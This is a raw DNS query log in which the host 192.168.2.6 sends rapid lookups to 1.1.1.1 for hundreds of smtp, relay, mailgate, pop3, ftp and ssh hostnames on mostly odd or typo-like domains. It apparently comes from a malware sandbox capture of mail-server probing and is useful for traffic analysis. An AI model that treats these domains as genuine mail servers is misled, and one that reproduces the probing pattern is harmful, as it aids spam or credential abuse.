Feb 21, 2024 00:26:17.281372070 CET	192.168.2.6	1.1.1.1	0x663f	Standard query (0)	relay.scw-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.289021015 CET	192.168.2.6	1.1.1.1	0xd12	Standard query (0)	relay.hotmail.demail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.293960094 CET	192.168.2.6	1.1.1.1	0x3a01	Standard query (0)	relay.lavera2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.295361996 CET	192.168.2.6	1.1.1.1	0xb9c0	Standard query (0)	mailgate.farma-aps.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.297316074 CET	192.168.2.6	1.1.1.1	0xf327	Standard query (0)	mailgate.homehotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.335486889 CET	192.168.2.6	1.1.1.1	0x3b48	Standard query (0)	relay.heinzerlinghotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.425918102 CET	192.168.2.6	1.1.1.1	0xf5d3	Standard query (0)	relay.generika-apotheke-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.428627014 CET	192.168.2.6	1.1.1.1	0x1cec	Standard query (0)	relay.hotmailhome.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.428627968 CET	192.168.2.6	1.1.1.1	0xe012	Standard query (0)	relay.kvapilova.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.429584026 CET	192.168.2.6	1.1.1.1	0xc60b	Standard query (0)	relay.zube-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.429584026 CET	192.168.2.6	1.1.1.1	0x76f1	Standard query (0)	relay.hotmail.fr.tr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.434765100 CET	192.168.2.6	1.1.1.1	0x9834	Standard query (0)	mailgate.hotmail.fr.ar	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.434765100 CET	192.168.2.6	1.1.1.1	0x40a6	Standard query (0)	relay.radiussystemllc.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.434765100 CET	192.168.2.6	1.1.1.1	0xb64b	Standard query (0)	relay.undercover-bietigheim.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.438285112 CET	192.168.2.6	1.1.1.1	0xf99e	Standard query (0)	mailgate.gothic-concerts.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.478200912 CET	192.168.2.6	1.1.1.1	0xf3c8	Standard query (0)	pop3.outlook.fr.sg	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.496918917 CET	192.168.2.6	1.1.1.1	0xc2ef	Standard query (0)	relay.terminatour-bohotmailing.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.498361111 CET	192.168.2.6	1.1.1.1	0xbfd	Standard query (0)	relay.spd-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.504308939 CET	192.168.2.6	1.1.1.1	0x818f	Standard query (0)	mailgate.fos-elektronik.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.506942987 CET	192.168.2.6	1.1.1.1	0x2fde	Standard query (0)	relay.rubypink.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.506942987 CET	192.168.2.6	1.1.1.1	0x6ba8	Standard query (0)	relay.hotmail.fryahoo.fr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.531337023 CET	192.168.2.6	1.1.1.1	0x1e43	Standard query (0)	mail.att.co.id	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.537530899 CET	192.168.2.6	1.1.1.1	0x9d56	Standard query (0)	relay.hotmail-topmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.537530899 CET	192.168.2.6	1.1.1.1	0xa215	Standard query (0)	relay.imao.ml	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.537530899 CET	192.168.2.6	1.1.1.1	0x552c	Standard query (0)	relay.jtirit.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.591053963 CET	192.168.2.6	1.1.1.1	0x930f	Standard query (0)	smtp.hotmailhome.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.591053963 CET	192.168.2.6	1.1.1.1	0xf57e	Standard query (0)	smtp.runyai-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.612318039 CET	192.168.2.6	1.1.1.1	0xd168	Standard query (0)	relay.hotmail.fr.br	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.619707108 CET	192.168.2.6	1.1.1.1	0x9226	Standard query (0)	relay.dancenight-express.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.621006966 CET	192.168.2.6	1.1.1.1	0x9dcc	Standard query (0)	relay.schupp-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.633507967 CET	192.168.2.6	1.1.1.1	0xc5c	Standard query (0)	relay.x-erfolgsteam.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.639324903 CET	192.168.2.6	1.1.1.1	0x9057	Standard query (0)	smtp.jtirit.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.641810894 CET	192.168.2.6	1.1.1.1	0x1dca	Standard query (0)	smtp.hotmail.fr.tr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.641810894 CET	192.168.2.6	1.1.1.1	0xe9aa	Standard query (0)	mailgate.outlook.fr.sg	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.668209076 CET	192.168.2.6	1.1.1.1	0xac8f	Standard query (0)	relay.tux4hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.706412077 CET	192.168.2.6	1.1.1.1	0x1d43	Standard query (0)	smtp.hotmail.demail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.706413031 CET	192.168.2.6	1.1.1.1	0x854c	Standard query (0)	smtp.terminatour-bohotmailing.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.839745998 CET	192.168.2.6	1.1.1.1	0x90cb	Standard query (0)	relay.hotmailjoy.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.840189934 CET	192.168.2.6	1.1.1.1	0x76f0	Standard query (0)	relay.ptotonmail.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.840720892 CET	192.168.2.6	1.1.1.1	0x7c75	Standard query (0)	relay.utlohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.858047962 CET	192.168.2.6	1.1.1.1	0xd22f	Standard query (0)	relay.gamma.ocm.ne.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.890173912 CET	192.168.2.6	1.1.1.1	0x1d23	Standard query (0)	relay.morr-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.983840942 CET	192.168.2.6	1.1.1.1	0xafed	Standard query (0)	mail.outlook.fr.sg	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.988351107 CET	192.168.2.6	1.1.1.1	0x7103	Standard query (0)	smtp.heinzerlinghotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.990499020 CET	192.168.2.6	1.1.1.1	0x5ee	Standard query (0)	relay.att.no	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:17.990499020 CET	192.168.2.6	1.1.1.1	0x21be	Standard query (0)	relay.smhotmaillang.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.029685020 CET	192.168.2.6	1.1.1.1	0x57c6	Standard query (0)	smtp.hotmail.fryahoo.fr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.074337959 CET	192.168.2.6	1.1.1.1	0xf120	Standard query (0)	relay.oulohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.074337959 CET	192.168.2.6	1.1.1.1	0x725	Standard query (0)	smtp.zube-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.112338066 CET	192.168.2.6	1.1.1.1	0xf08a	Standard query (0)	relay.igs-ruelzheim.rp.lo-net2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.112637043 CET	192.168.2.6	1.1.1.1	0x291f	Standard query (0)	smtp.generika-apotheke-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.115372896 CET	192.168.2.6	1.1.1.1	0xfdbf	Standard query (0)	smtp.tux4hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.116796017 CET	192.168.2.6	1.1.1.1	0xbf1b	Standard query (0)	smtp.utlohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.120301008 CET	192.168.2.6	1.1.1.1	0xd331	Standard query (0)	smtp.rubypink.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.155992031 CET	192.168.2.6	1.1.1.1	0x5de2	Standard query (0)	relay.homehotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.155992031 CET	192.168.2.6	1.1.1.1	0x8bbd	Standard query (0)	smtp.scw-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.157531977 CET	192.168.2.6	1.1.1.1	0xc637	Standard query (0)	relay.esafrica.co.zw	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.157531977 CET	192.168.2.6	1.1.1.1	0x9134	Standard query (0)	smtp.imao.ml	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.209302902 CET	192.168.2.6	1.1.1.1	0xf44a	Standard query (0)	smtp.lavera2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.210202932 CET	192.168.2.6	1.1.1.1	0xc728	Standard query (0)	relay.sq-community.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.311384916 CET	192.168.2.6	1.1.1.1	0x7e2b	Standard query (0)	ftp.b4l-clan.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.328989029 CET	192.168.2.6	1.1.1.1	0x987c	Standard query (0)	smtp.smhotmaillang.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.332304955 CET	192.168.2.6	1.1.1.1	0xf1f8	Standard query (0)	smtp.att.no	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.356561899 CET	192.168.2.6	1.1.1.1	0x67f5	Standard query (0)	smtp.homehotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.360833883 CET	192.168.2.6	1.1.1.1	0x400a	Standard query (0)	smtp.ufer-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.432462931 CET	192.168.2.6	1.1.1.1	0x7752	Standard query (0)	relay.ufer-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.436553955 CET	192.168.2.6	1.1.1.1	0x4a69	Standard query (0)	smtp.schupp-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.437201977 CET	192.168.2.6	1.1.1.1	0x434e	Standard query (0)	relay.farma-aps.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.438260078 CET	192.168.2.6	1.1.1.1	0xf36f	Standard query (0)	smtp.morr-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.439201117 CET	192.168.2.6	1.1.1.1	0xae04	Standard query (0)	smtp.fos-elektronik.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.465742111 CET	192.168.2.6	1.1.1.1	0xc719	Standard query (0)	smtp.kvapilova.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.466727972 CET	192.168.2.6	1.1.1.1	0xc248	Standard query (0)	smtp.oulohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.503248930 CET	192.168.2.6	1.1.1.1	0x1b43	Standard query (0)	smtp.x-erfolgsteam.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.503679037 CET	192.168.2.6	1.1.1.1	0xc094	Standard query (0)	smtp.gothic-concerts.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.507961035 CET	192.168.2.6	1.1.1.1	0x80ed	Standard query (0)	relay.newhotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.520308971 CET	192.168.2.6	1.1.1.1	0x9ea9	Standard query (0)	relay.att.in	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.578479052 CET	192.168.2.6	1.1.1.1	0xde04	Standard query (0)	smtp.hotmail.fr.br	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.579082012 CET	192.168.2.6	1.1.1.1	0xf81c	Standard query (0)	smtp.hotmail-topmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.668370008 CET	192.168.2.6	1.1.1.1	0xff41	Standard query (0)	smtp.ptotonmail.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.668951988 CET	192.168.2.6	1.1.1.1	0xf4a4	Standard query (0)	smtp.jalds.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.728065014 CET	192.168.2.6	1.1.1.1	0x2813	Standard query (0)	smtp.spd-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.729008913 CET	192.168.2.6	1.1.1.1	0xd9c1	Standard query (0)	smtp.igs-ruelzheim.rp.lo-net2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.729496002 CET	192.168.2.6	1.1.1.1	0xd334	Standard query (0)	smtp.hotmailjoy.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.751039982 CET	192.168.2.6	1.1.1.1	0x6fd4	Standard query (0)	ftp.archononline.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.781524897 CET	192.168.2.6	1.1.1.1	0xa9af	Standard query (0)	smtp.undercover-bietigheim.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.781708956 CET	192.168.2.6	1.1.1.1	0xf0a2	Standard query (0)	smtp.hotmail.fr.ar	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.823199987 CET	192.168.2.6	1.1.1.1	0xa231	Standard query (0)	smtp.radiussystemllc.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.829596043 CET	192.168.2.6	1.1.1.1	0x6716	Standard query (0)	smtp.esafrica.co.zw	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.831756115 CET	192.168.2.6	1.1.1.1	0x6f57	Standard query (0)	relay.hotmail.fr.ar	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.914781094 CET	192.168.2.6	1.1.1.1	0xa5c9	Standard query (0)	smtp.newhotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.917830944 CET	192.168.2.6	1.1.1.1	0x1937	Standard query (0)	smtp.dancenight-express.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.921529055 CET	192.168.2.6	1.1.1.1	0x5254	Standard query (0)	smtp.farma-aps.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.989999056 CET	192.168.2.6	1.1.1.1	0x8e49	Standard query (0)	ftp.imailzone.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.990510941 CET	192.168.2.6	1.1.1.1	0x37c0	Standard query (0)	smtp.gamma.ocm.ne.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:18.997364998 CET	192.168.2.6	1.1.1.1	0xafed	Standard query (0)	mail.outlook.fr.sg	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.000710011 CET	192.168.2.6	1.1.1.1	0x305f	Standard query (0)	relay.gothic-concerts.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.155946970 CET	192.168.2.6	1.1.1.1	0x4dcb	Standard query (0)	smtp.att.in	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.210549116 CET	192.168.2.6	1.1.1.1	0x79ae	Standard query (0)	relay.fos-elektronik.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.411209106 CET	192.168.2.6	1.1.1.1	0x406	Standard query (0)	mail.joaz.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.413629055 CET	192.168.2.6	1.1.1.1	0x27a	Standard query (0)	ftp.hotmail.fr.au	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.519197941 CET	192.168.2.6	1.1.1.1	0xedeb	Standard query (0)	voltagedistribution-com01i.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.519198895 CET	192.168.2.6	1.1.1.1	0xb165	Standard query (0)	waukeshawater-com02b.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.538562059 CET	192.168.2.6	1.1.1.1	0x7bcb	Standard query (0)	relay.outlook.fr.sg	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.652312994 CET	192.168.2.6	1.1.1.1	0xd9ee	Standard query (0)	imap.att.co.id	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.746036053 CET	192.168.2.6	1.1.1.1	0x6fd4	Standard query (0)	ftp.archononline.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.829288006 CET	192.168.2.6	1.1.1.1	0xe9a7	Standard query (0)	mx2.ovh.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.842271090 CET	192.168.2.6	1.1.1.1	0x1a4a	Standard query (0)	architettosangiorgio-ch.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.892585039 CET	192.168.2.6	1.1.1.1	0x1779	Standard query (0)	pop.joaz.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:19.942990065 CET	192.168.2.6	1.1.1.1	0xc32a	Standard query (0)	smtp.outlook.fr.sg	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.247168064 CET	192.168.2.6	1.1.1.1	0x87c6	Standard query (0)	pharmacievp-fr02c.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.378073931 CET	192.168.2.6	1.1.1.1	0x93bb	Standard query (0)	ftp.eskimo.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.550717115 CET	192.168.2.6	1.1.1.1	0x7b25	Standard query (0)	mailgate.jalds.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.708231926 CET	192.168.2.6	1.1.1.1	0xd9ee	Standard query (0)	imap.att.co.id	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.716159105 CET	192.168.2.6	1.1.1.1	0x34e1	Standard query (0)	mailgate.rubypink.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.716382027 CET	192.168.2.6	1.1.1.1	0x6aae	Standard query (0)	mailgate.hotmailhome.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.716928005 CET	192.168.2.6	1.1.1.1	0x7618	Standard query (0)	mailgate.scw-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.717236042 CET	192.168.2.6	1.1.1.1	0xbf93	Standard query (0)	mailgate.hotmail.fr.tr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.717530966 CET	192.168.2.6	1.1.1.1	0x7eb7	Standard query (0)	mailgate.hotmail-topmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.717662096 CET	192.168.2.6	1.1.1.1	0xcd4c	Standard query (0)	mailgate.radiussystemllc.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.718024015 CET	192.168.2.6	1.1.1.1	0x8def	Standard query (0)	mailgate.hotmail.fryahoo.fr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.719554901 CET	192.168.2.6	1.1.1.1	0xc6d1	Standard query (0)	mailgate.imao.ml	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.721672058 CET	192.168.2.6	1.1.1.1	0x1caa	Standard query (0)	mailgate.schupp-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.726202965 CET	192.168.2.6	1.1.1.1	0xfa1b	Standard query (0)	mailgate.undercover-bietigheim.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.727220058 CET	192.168.2.6	1.1.1.1	0x87cd	Standard query (0)	mailgate.runyai-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.727468967 CET	192.168.2.6	1.1.1.1	0x1534	Standard query (0)	mailgate.hotmail.fr.br	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.745997906 CET	192.168.2.6	1.1.1.1	0xdae3	Standard query (0)	mailgate.generika-apotheke-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.746186018 CET	192.168.2.6	1.1.1.1	0xade8	Standard query (0)	mailgate.x-erfolgsteam.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.873492956 CET	192.168.2.6	1.1.1.1	0x5a0	Standard query (0)	mailgate.lavera2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:20.873657942 CET	192.168.2.6	1.1.1.1	0x10e3	Standard query (0)	mailgate.tux4hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.711924076 CET	192.168.2.6	1.1.1.1	0xd9ee	Standard query (0)	imap.att.co.id	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.713325024 CET	192.168.2.6	1.1.1.1	0x4aa7	Standard query (0)	relay.hotmailhome.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.713325024 CET	192.168.2.6	1.1.1.1	0x3f95	Standard query (0)	mailgate.farma-aps.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.715943098 CET	192.168.2.6	1.1.1.1	0xa7a9	Standard query (0)	relay.terminatour-bohotmailing.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.716141939 CET	192.168.2.6	1.1.1.1	0xc599	Standard query (0)	mailgate.utlohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.717138052 CET	192.168.2.6	1.1.1.1	0xda15	Standard query (0)	mailgate.esafrica.co.zw	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.717138052 CET	192.168.2.6	1.1.1.1	0x2fc4	Standard query (0)	relay.hotmail.demail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.717498064 CET	192.168.2.6	1.1.1.1	0x6ae4	Standard query (0)	mailgate.gamma.ocm.ne.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.717498064 CET	192.168.2.6	1.1.1.1	0x2689	Standard query (0)	mailgate.kvapilova.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.717688084 CET	192.168.2.6	1.1.1.1	0xda1c	Standard query (0)	mailgate.igs-ruelzheim.rp.lo-net2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.717688084 CET	192.168.2.6	1.1.1.1	0xcedd	Standard query (0)	mailgate.newhotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.717847109 CET	192.168.2.6	1.1.1.1	0x4418	Standard query (0)	mailgate.spd-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.717847109 CET	192.168.2.6	1.1.1.1	0x5553	Standard query (0)	mailgate.hotmailjoy.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.718214989 CET	192.168.2.6	1.1.1.1	0x7c8b	Standard query (0)	smtp.joaz.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.718214989 CET	192.168.2.6	1.1.1.1	0xfa20	Standard query (0)	mailgate.ptotonmail.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.718396902 CET	192.168.2.6	1.1.1.1	0x182f	Standard query (0)	mailgate.homehotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.718398094 CET	192.168.2.6	1.1.1.1	0x27c8	Standard query (0)	mailgate.smhotmaillang.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.718555927 CET	192.168.2.6	1.1.1.1	0xc613	Standard query (0)	pop3.joaz.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.718555927 CET	192.168.2.6	1.1.1.1	0x3dd4	Standard query (0)	mailgate.att.no	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.718767881 CET	192.168.2.6	1.1.1.1	0x10b9	Standard query (0)	mailgate.att.in	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.718767881 CET	192.168.2.6	1.1.1.1	0xee3e	Standard query (0)	mailgate.gothic-concerts.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.718930960 CET	192.168.2.6	1.1.1.1	0x7687	Standard query (0)	mailgate.ufer-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.718930960 CET	192.168.2.6	1.1.1.1	0x31c7	Standard query (0)	mailgate.fos-elektronik.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.720483065 CET	192.168.2.6	1.1.1.1	0x77cc	Standard query (0)	mailgate.oulohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.724313974 CET	192.168.2.6	1.1.1.1	0x875e	Standard query (0)	ftp.mlbx.matrix.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.726500034 CET	192.168.2.6	1.1.1.1	0xf1fd	Standard query (0)	relay.heinzerlinghotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.757272005 CET	192.168.2.6	1.1.1.1	0x900d	Standard query (0)	mailgate.zube-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.757272005 CET	192.168.2.6	1.1.1.1	0x9140	Standard query (0)	mailgate.dancenight-express.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.757564068 CET	192.168.2.6	1.1.1.1	0x62be	Standard query (0)	mailgate.morr-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.763546944 CET	192.168.2.6	1.1.1.1	0x6451	Standard query (0)	mailgate.jtirit.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.805916071 CET	192.168.2.6	1.1.1.1	0x6358	Standard query (0)	relay.runyai-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:21.877857924 CET	192.168.2.6	1.1.1.1	0x3947	Standard query (0)	relay.lavera2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.045747995 CET	192.168.2.6	1.1.1.1	0xc957	Standard query (0)	relay.imao.ml	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.046608925 CET	192.168.2.6	1.1.1.1	0x7835	Standard query (0)	relay.jtirit.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.142498970 CET	192.168.2.6	1.1.1.1	0x645f	Standard query (0)	imp.ovh.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.189204931 CET	192.168.2.6	1.1.1.1	0xe3c	Standard query (0)	relay.rubypink.co.uk	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.189204931 CET	192.168.2.6	1.1.1.1	0x320d	Standard query (0)	relay.scw-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.191515923 CET	192.168.2.6	1.1.1.1	0xb3d7	Standard query (0)	relay.hotmail.fryahoo.fr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.352910995 CET	192.168.2.6	1.1.1.1	0x6f4d	Standard query (0)	relay.hotmail-topmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.360308886 CET	192.168.2.6	1.1.1.1	0x7b21	Standard query (0)	relay.zube-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.414781094 CET	192.168.2.6	1.1.1.1	0xe290	Standard query (0)	ssh.b4l-clan.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.658806086 CET	192.168.2.6	1.1.1.1	0x7e3e	Standard query (0)	relay.radiussystemllc.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.669784069 CET	192.168.2.6	1.1.1.1	0x6186	Standard query (0)	relay.kvapilova.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.745642900 CET	192.168.2.6	1.1.1.1	0xaabc	Standard query (0)	mailgate.joaz.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.745958090 CET	192.168.2.6	1.1.1.1	0xfa63	Standard query (0)	relay.att.no	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.840105057 CET	192.168.2.6	1.1.1.1	0xea99	Standard query (0)	relay.hotmail.fr.tr	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.840332985 CET	192.168.2.6	1.1.1.1	0x6998	Standard query (0)	relay.hotmail.fr.br	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.896234035 CET	192.168.2.6	1.1.1.1	0x920c	Standard query (0)	relay.hotmailjoy.de	A (IP address)	IN (0x0001)	false
